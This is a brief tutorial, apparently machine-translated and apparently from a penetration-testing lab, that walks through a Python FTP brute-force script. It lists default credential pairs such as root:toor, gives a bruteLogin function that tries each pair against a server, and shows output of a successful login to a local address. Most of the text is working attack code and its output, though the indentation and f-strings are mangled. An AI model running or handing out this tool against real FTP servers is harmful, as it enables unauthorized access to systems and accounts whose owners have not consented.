Brute force FTP user name / password , Suppose the user name / Password pairs are stored in a plain text file . As shown below :
administrator:password
admin:12345
root:secret
guest:guest
root:toor
xiaowei:xiaowei
kali_lxw:kali
Create a file called bruteLogin() Function of , The parameters this function receives are the host name and the file containing the password , Return a user name that can log in to the host / password . This function reads each line of record in the file line by line , The user name and password are separated by colons . The function then attempts to log in with this username and password FTP The server . If it works , Returns a username and password tuple. If you fail , Skip the exception and continue to the next line . If the function exhausts all lines and fails to log in , Returns a value of None 、None Of tuple.
The sample code is as follows :
import ftplib
def bruteLogin(hostname, passwdFile):
with open(passwdFile, 'r') as pF:
for line in pF.readlines():
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('\r').strip('\n')
print(f'[+] Trying {
userName}/{
passWord}')
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
print(f'\n[*] {
str(hostname)} FTP Logon Succeeded: {
userName}/{
passWord}')
ftp.quit()
return (userName, passWord)
except Exception as e:
pass
print('\n[-] Could not brute force FTP credentials')
return (None, None)
host = '192.168.31.82'
passwdFile = 'userpass.txt'
bruteLogin(host, passwdFile)
By traversing the user name / After the list of password pairs , Finally found a valid user name / Password pairs :xiaowei/xiaowei. The running results are as follows :
[+] Trying administrator/password
[+] Trying admin/12345
[+] Trying root/secret
[+] Trying guest/guest
[+] Trying root/toor
[+] Trying xiaowei/xiaowei
[*] 192.168.31.82 FTP Logon Succeeded: xiaowei/xiaowei
Process finished with exit code 0